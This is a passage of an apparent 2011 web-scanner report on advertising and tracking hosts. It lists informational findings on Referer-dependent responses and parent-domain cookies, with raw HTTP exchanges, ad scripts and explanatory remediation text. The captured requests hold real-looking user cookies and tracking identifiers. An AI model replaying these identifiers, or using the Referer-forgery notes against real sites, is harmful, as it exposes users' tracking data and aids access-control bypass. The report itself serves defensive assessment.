UkIT469uS1TR+zkUJnhtPOzR5oPxxfmtE4vTLysJzCsuZY0KaZF3o1b6Yh8paN9qwUBV8R+vYtWNuaXSKaFsAWASQocuwiAYwyatk78mvmhA/RnDRWxFdxotmakTxLvxzdq20H2gNsfqEt7Fr2/Uh+++at/ksN76MFaJqO/bHkpoPu1gxHvKE9/0WMUVGMcm+6yyK+UG+alVWR/xvTeJmgll+2K5e9GyGLi/m3caGDdFwjN956qZoIxWHJA6AgPh7pKjFfoub0NM8jvqk69NazhEPpf3w2zbu+8yR3WGhP8zmoR6Rq73hajz6P98Iz6wvHDPDF7NOh2eR4AjPxQGp004z0qhExX1GC9nQYmTybV4IuJxurDjTji5yZDzRQY7cou3zrZ/OeESC6R5U4GbP69VvQ1FHhRDn7/D8gBKB6tDfEZV4tgGLWbTk+afHTH3j54xDk4yOl6Fx0oXVI2yyVgY27oyTAqHr4erT0JEcynxQEX17ZG6jk0i7Lvp6W1t6qdrx4IjeSjvpTp2NgZepvB/QSSCrrLZmWLcfno6pocoCk4/2SxgR5UeVjIHZgwNuNyBaWMutI8AJTw/0lL66llJmLjDmyMjB1t3dxVUjfg4suAfkuSjQR4zU9jwdsDhHM2yr45NHlR80Odampgef9bMqJglD/rX8j1N+u6IunIEoNNi4sdBAnypfFOOaEJ678vsSgaICcHnT5o+Wd; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; rtc_N2gr=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; rsi_segs_1000000=pUPF40mhOXMQJ/AtY6gq+mlXT522ui4UYAcRGaESFrJx8TYUFUcMpoM7enamDct4VKj1xrFdOTqQUQ3pUP1MDghOnCvRZ0214o3xUtaZ68nIc1VnMLmCIeegv3Y1WwDp8AIdZ5hqHKU38yRCkO6EVyoNTQYIOyyB1bbJfhYCtxeN4FAMThtqRqzLjZec6jzqKUqLrjFKfNTfGk4gg0636KgeJeemkPacnGpzcBVfhaHGh5+5HatXnwl381BaqY81KvvzuBGONoXhIx83OpFD1tR3YfP3a7TkLLmV2qsPCs2IcxdTv8Z16030H4XyXKyhS7zAQxpqNX2/4kAmja7XaES27kxmvzOlOPMbUj6Cm3SfhwUTUthzNXzAtwRv6N00BGCYDAEY0T/+ocHSxN122t3XU3Lo1znyYeQ5gm98FTKbZYCcHFYUxDfLnpQh/6WqsBCfkrnJY6wvtK/jYdP7J9OWHJkd7czh0TuDEHoC49Ec5JTCdMeKygbXcL5Lf3iaMe9U018EYDX8emPwX8aTEio9Ynai0hDVaDgWj97fMo3h52SvvCg+a19cEIM3kBs+74ch0R+eVGZ+XE7xwIhKXTKkfJdg/3giiKh210fg/DaUe0yC7PRLTYPHOA+VejPfTuHoHDTX+/kUH2Zmc9IQpJmuppdilLBRA2hqW5r1TlfG4514tvrmi17RqHW6+HrVV40axtQ8MF8jfSxfZkXojxtpdBcKyJ9yZNzbCDC3ghRqJkiyUvtT2jSVAmK/flOnpnuLsUg3lzgJ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLvvNzMNZjhn3tNDUOn9Rw8CYJMzyjPPqEpc6O1HdA/zzwOIp+sMJM4VFVYB3OpUU0Eex6sURtMmxQwz6+tPZPApyOqS7g99GMSlNrlAMps04cSedAn0IHXaA6HiLUb7qM4X8AOUEawZhuwWzp6c0KbcO2TUC5j9Vhfie38FUKM8aPJdRgSI8gH4DgLkhRAW1voZVLV22LWHD9x/LShkRAFDrVPJ6+nAR7qS2QAMkg+4V6hmeFK470y5/JreGq1OsV7CmpKIKeQX0bSU/sz+CBDDbXgJKhUFq0XV88GGTWey45AOSM5gGf/VqI1WQntr0wWO/v1K5LbeIw4wmQPr6j42qIH51QjKTPKQP6YS0oGeHR9Nxa2oQiLcrS22kph/+KKvHbRMFKtHjw5eMujbD9tXhWgCGl10krsYyKQN6sn5aBkMs/oENeO0I5AkdqCk4US+kRmDl449iPXMzxpZJvVuZQDT9tMHRt9vWVtNi2Q/tStqPDiho1pOU70sNzyrtDPMlI/drhVLnJEZaVQPGTYGx6kucKJySP5FU+SitbJPyVTemroXui3iD8kNAOsweLrT2Eh3p08TbSrpAI6Z8HIna/jCWCZG0Sp7Kl1Y74SO7Dh2T3m54BdqXEsPYwS6S9m3aWIK7fnONxYsBrCSfQN2Y/h5GAhbAReubQq4SMH47piiZ8kZ5LPKtMR2yW2wqx2hTjeLghk782jfxS5UrWh4OLjdOuHdbTpckQtOdMOOrkb5BVOJnhNwZxmuvUBKsIp0peqVZ9iGb/aGfOMdGu4Qkcu/bZlCp7uRcwgKnOnbYBaBkLE7LZg+WO87vrtSKJPAO5wDoTy7iJUSdTdaKDuZ6v5sLNcvn1QlDZ/6oImvljd2T7BeVlJXZM6vJx8mWsoBt59CH/Fw8xuPDuiyi8nFSERZO6xMToJD46zqmoSGNsZkTqb2KE717ePaHqAfO+HtJ/7ESMU0kV159tivauG9q9ojiwbFmgTsYnCFLNz/OYnIXX4NkvmXBkP653UAPTCDtiH+FFfy9uC4xdNOfTXDwzUMzig99guz8s+jgtMuCZpEVWNU4qE4phlHHqJsQZacTdsz5EXFvlSiA+HN3yCDoXUpWowvKCmLmYh3H4iY+Ad+lG0irVW50iYphrVJ78FMwpO1ctZfuOhAVf38gLcYAdmdCQZO6+HVhoW5/YIYrdMIAu5H0EjC+fG3UFMYo7HmokVwE//3QYTJ1nj+oYhQEhBk9hBS7qjzktjOh1z3twgI/Fs2/lL9q4rgbKfO+HlYYEt8JUNARGj5iC2poGY+jlw+Q7uHMLeNRYoLR/z68dzL1wqM4L++E3oQE95rzHCL6VgxMC1Wo9S7vjrx3pf9uV+lWVJRED8M95ESou7uETnWfT1iu9fLZ2KBiKt6eyheQvVDWWcZvNIxBBfnCN1mEGFEzZR+2DOAQE7L08ytW0rWVMgb3JMkJ7HvAh0w90/LNix9KbSSR1sAPSSIqpVb1YETC128nQNgOUXKrP1VYdYc9znE6q2qpqp3gbBtpx2do0ASA6mnBlNFShdDkVlPpKtekr9afgmaeCEsCCSUZFsDYNLj8HVL/kJSu3h9fsdlY5yMLOEoJ+KgifbUZhAhe/LqoUkdFHosX6botHcT27YxhTbq9uF5oVjnG7Y112pFY6MtQUvC7SXhtC/wAwvHdX3DhiG7Pxw/Y0sDcyKpZuI7TRZsRNGtqcRlVlAaQ/RIdgIlWHEFJcajqhexFsZpjRpkFzNbtZ9xlJARDg==; Domain=.revsci.net; Expires=Fri, 22-Jun-2012 11:11:58 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 11:11:57 GMT
Content-Length: 6045

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'G07610';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...

9. Referer-dependent response previous next
There are 2 instances of this issue:

http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
http://delivery.steelhousemedia.com/serve

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

9.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Request 1

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-20-2011-20-17-03_8887292771308601023; SERVERID=s9

Response 1

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:44:47 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Sun, 26-Jun-2011 13:44:47 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_15862708731308836687; expires=Tue, 21-Jun-2016 13:44:47 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_15862708731308836687; expires=Thu, 23-Jun-2011 13:59:47 GMT; path=/; domain=c3metrics.com
Content-Length: 6651
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if(!window.c3Vinter){function c3VTJSInter(){this.c3VInter={c3VJSurl:'c3VTabstrct-6-2.php'},this.c3VTVersion={vNo:'6.1.0',feature:'mNs+uI+in-view only+KL-for domain check, not CID'},this.c3VJS={c3VJSvtlog:'vtcall.php',c3VJSnid:'',c3VJScid:'',c3VJSuid:'',c3VJSnuid:'',c3VJSdomain:null,c3VJStv:'',c3VJSSPlitchar:'-',c3VJSunique:null,c3VJStag:0,c3VJSrun:0,c3Vresult:1,c3VJSuidSet:'',c3VJSrvSet:'',c3VJShold:new Array(),c3VJSsrcTag:0,c3VJSviewPortW:0,c3VJSviewPortH:0,c3VJSlimitW:600,c3VJSendW:300,c3VJSlimitH:600,c3VJSviewDelay:'',c3VJSinViewPid:null,c3VJSviewportwidth:0,c3VJSviewportheight:0,c3VJSeleTop:0,c3VJSeleBot:0,c3VJSeleLeft:0,c3VJSeleRight:0,c3VJSsrollLeft:0,c3VJSsrollTop:0,c3VJSevent:0,c3VTobjectName:0,c3VJScallurl:null,srcTag:0},this.C3VJSFindBaseurl=function(a,b){var c=document.getElementsByTagName('script');var d;var e;var f;var g;if(a.search('/')!=-1){var h=a.split('/');f=h[1]}else{f=a}var j=c.length;for(var i=0;i<j;i++){e=c[i].src;var k=new Array();k=e.split('?');d=k[0].search(b);if(d!=-1){g=k[0].replace(b,f);i=j}}return g},this.loadNewP=function(){var a=String(Math.floor(Math.random()*100));this.c3VJS.c3VJSinViewPid=a;try{b=document.createElement('<p id='+this.c3VJS.c3VJSinViewPid+'></p>')}catch(e){var b=document.createElement('p');b.setAttribute('id',this.c3VJS.c3VJSinViewPid)}var
...[SNIP]...

Request 2

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-20-2011-20-17-03_8887292771308601023; SERVERID=s9

Response 2

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:44:49 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 0
Connection: close
Content-Type: text/html

9.2. http://delivery.steelhousemedia.com/serve previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://delivery.steelhousemedia.com
Path:	/serve

Request 1

GET /serve?ms=1&cb=457598401&eid=62 HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="

Response 1

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Sun, 20-Jun-2021 13:45:23 GMT;Max-Age=315360000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

document.write('<iframe src="http://delivery.steelhousemedia.com/serve?cb=457598401&sh_rid=adserver004:939900&ms=1&aid=6010&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck=" frameborder="0" scrolling="no" marginwidth="0" marginheight="0" width="300" height="250" id="457598401"></iframe>');

Request 2

GET /serve?ms=1&cb=457598401&eid=62 HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="

Response 2

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Sun, 20-Jun-2021 13:45:26 GMT;Max-Age=315360000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

document.write('<iframe src="http://delivery.steelhousemedia.com/serve?cb=457598401&sh_rid=adserver004:939936&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&tp=457598401&ck=" frameborder="0" scrolling="no" marginwidth="0" marginheight="0" width="300" height="250" id="457598401"></iframe>');

10. Cookie scoped to parent domain previous next
There are 22 instances of this issue:

http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
http://a.tribalfusion.com/j.ad
http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet
http://ad.trafficmp.com/a/bpix
http://ad.turn.com/server/pixel.htm
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ak1.abmr.net/is/tag.contextweb.com
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://b.scorecardresearch.com/r
http://bh.contextweb.com/bh/rtset
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://cw-m.d.chango.com/m/cw
http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0
http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000
http://delivery.steelhousemedia.com/serve
http://future.grapeshot.co.uk/tech/channels.cgi
http://i.w55c.net/ping_match.gif
http://ib.adnxs.com/ab
http://id.google.com/verify/EAAAAFhuTOo3sUWykPGD2UWXAkw.gif
http://js.revsci.net/gateway/gw.js

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

10.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

480-SM=adver_06-20-2011-20-17-03; expires=Sun, 26-Jun-2011 13:44:47 GMT; path=/; domain=c3metrics.com
480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_15862708731308836687; expires=Tue, 21-Jun-2016 13:44:47 GMT; path=/; domain=c3metrics.com
480-nUID=adver_15862708731308836687; expires=Thu, 23-Jun-2011 13:59:47 GMT; path=/; domain=c3metrics.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-20-2011-20-17-03_8887292771308601023; SERVERID=s9

Response

10.2. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

